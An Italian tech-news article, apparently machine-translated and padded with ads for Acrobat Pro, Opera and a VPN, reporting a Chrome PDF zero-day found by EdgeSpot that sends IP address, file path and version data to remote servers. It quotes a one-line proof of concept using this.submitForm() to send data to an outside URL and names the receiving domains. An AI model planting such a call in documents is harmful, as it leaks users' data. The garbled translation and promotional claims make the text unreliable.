- EdgeSpot ha scoperto un'intrigante vulnerabilità zero-day che sfrutta i documenti PDF in Chrome.
- Questo vulnerabilità può danneggiarti raccogliendo i dati sensibili sul tuo PC.
- Esplora il nostro Pagina web e cloud per ulteriori approfondimenti su altri strumenti e servizi.
- Se sei interessato ai browser, forniamo molte informazioni su di essi nel nostro Hub browser.
Rendi tutti i tuoi documenti accessibili e protetti utilizzando Adobe Acrobat Reader. Questo strumento di gestione dei documenti ti consentirà anche di firmare elettronicamente e creare moduli ufficiali per risparmiare tempo al lavoro. Scaricalo per il tuo PC e sarai in grado di:
- Apri, stampa e modifica tutti i tuoi PDF e altri tipi di file
- Compila i moduli PDF più facilmente
- Mantieni crittografati i tuoi documenti essenziali
Ottieni tutte le app a un prezzo speciale!
Il software di gestione dei documenti Nr.1 al mondo è ora ad un ottimo prezzo, quindi affrettati!
Il servizio di rilevamento degli exploit EdgeSpot ha scoperto un intrigante Cromo vulnerabilità zero-day che sfrutta i documenti PDF.
La vulnerabilità consente agli aggressori di raccogliere dati sensibili utilizzando documenti PDF dannosi aperti in Chrome.
Non appena la vittima apre i rispettivi file PDF in Google Chrome, un programma dannoso inizia a funzionare in background raccogliendo i dati dell'utente.
I dati vengono quindi inoltrati al server remoto controllato dagli hacker. Potresti chiederti quali dati vengono risucchiati dagli aggressori, prendono di mira i seguenti dati sul tuo PC:
- indirizzo IP
- Percorso completo del file PDF sul sistema
- OS e versioni di Chrome
Fai attenzione ai file PDF infestati da malware
Esperti macchiato quello dei due domini readnotify[.]com o burpcollaborator[.]net stava ricevendo i dati.
Hanno rivelato che gli aggressori stanno usando il this.submitForm() PDF Javascript API per raccogliere le informazioni sensibili degli utenti.
L'abbiamo testato con un PoC minimo, una semplice chiamata API come this.submitForm(' http://google.com/test’) farà in modo che Google Chrome invii i dati personali a google.com.
Questo bug di Chrome veniva sfruttato da due distinti set di file PDF dannosi, entrambi circolati rispettivamente nell'ottobre 2017 e nel settembre 2018.
In particolare, i dati raccolti possono essere utilizzati dagli aggressori per mettere a punto gli attacchi in futuro. I rapporti suggeriscono che il primo batch di file è stato compilato utilizzando il servizio di tracciamento PDF di ReadNotify.
Gli utenti possono utilizzare il servizio per tenere traccia delle visualizzazioni degli utenti. EdgeSpot non ha condiviso alcun dettaglio sulla natura del secondo set di file PDF.
Suggerimento rapido: cambia il tuo browser in Opera
In questi tempi difficili, veniamo attaccati da malware, phishing e trojan ad ogni passo, quindi dobbiamo essere molto più vigili e rimanere protetti.
E poiché questo è un problema specifico di Chrome, puoi evitare quella minaccia e tutte le altre con un browser orientato alla sicurezza come musica lirica.
Questo browser è dotato di un blocco degli annunci integrato che non solo elimina tali distrazioni ma anche blocca script di analisi, pixel di tracciamento e metodi per raccogliere i tuoi dati.
E se vuoi essere assolutamente sicuro di stare lontano da qualsiasi pericolo, mettiti dietro il built-in VPN servizio gratuito al 100% per un tempo illimitato.
musica lirica
Opera offre la perfetta protezione dalle minacce con il blocco degli annunci integrato e il servizio VPN gratis!
Visita il sito web
Come posso rimanere protetto dalle vulnerabilità PDF?
Scarica Adobe Acrobat PRO
Adobe e Chrome si abbinano bene quando si tratta di gestire i file PDF. Installando l'estensione Adobe per Chrome, puoi rivedere e manipolare i PDF a tuo piacimento senza uscire dal tuo browser preferito.
Nonostante la sua struttura robusta, il malware nascosto nei file PDF potrebbe non essere rilevato se utilizzi la versione standard di Reader.
La versione professionale è consigliata per garantire la tua protezione e tenere i tuoi dati lontani dagli hacker.
Sebbene non sia gratuito, il prezzo che pagherai è piuttosto basso per la pletora di funzionalità aggiuntive di cui godrai, inclusa la maggiore sicurezza dei tuoi file PDF.
È inclusa anche una prova gratuita di 7 giorni in modo da poter avere un assaggio dell'esperienza Pro completa prima di effettuare l'acquisto.
Adobe Acrobat PRO
Stai lontano dai malware scaricando Adobe Acrobat PRO. Ha molte più funzionalità rispetto alla versione gratuita e mantiene i tuoi dati al sicuro.
Visita il sito web
Nel caso in cui desideri essere sicuro durante la navigazione in Internet, dovrai procurarti uno strumento completamente dedicato per proteggere la tua rete. Installa l'accesso privato a Internet ora e mettiti al sicuro. Protegge il tuo PC dagli attacchi durante la navigazione, maschera il tuo indirizzo IP e blocca tutti gli accessi indesiderati.
Il servizio di rilevamento degli exploit EdgeSpot ha voluto avvisare gli utenti di Chrome dei potenziali rischi perché la patch non sarebbe stata rilasciata nel prossimo futuro.
EdgeSpot ha riferito a Google della vulnerabilità lo scorso anno e la società ha promesso di rilasciare una patch alla fine di aprile.
Tuttavia, puoi prendere in considerazione l'utilizzo di una soluzione temporanea al problema visualizzando localmente i documenti PDF ricevuti utilizzando un'altra app di lettura.
In alternativa, puoi anche aprire i tuoi documenti PDF in Chrome scollegando i tuoi sistemi da Internet.
Domande frequenti
Sì, lo fa. Ma se vuoi una selezione più ampia, esplora le nostre migliori scelte per Cromoprivacy estensioni in questa guida completa.
Tqui ci sono molte estensioni che lo consentono PDF in lavorazione. Dai un'occhiata fuori dal nostro ottima guida sulle migliori estensioni PDF per Chrome.
No, ma puoi attivarlo rapidamente. Ecco il nostro guida completa su come abilitare il generatore di codici QR in Chrome.
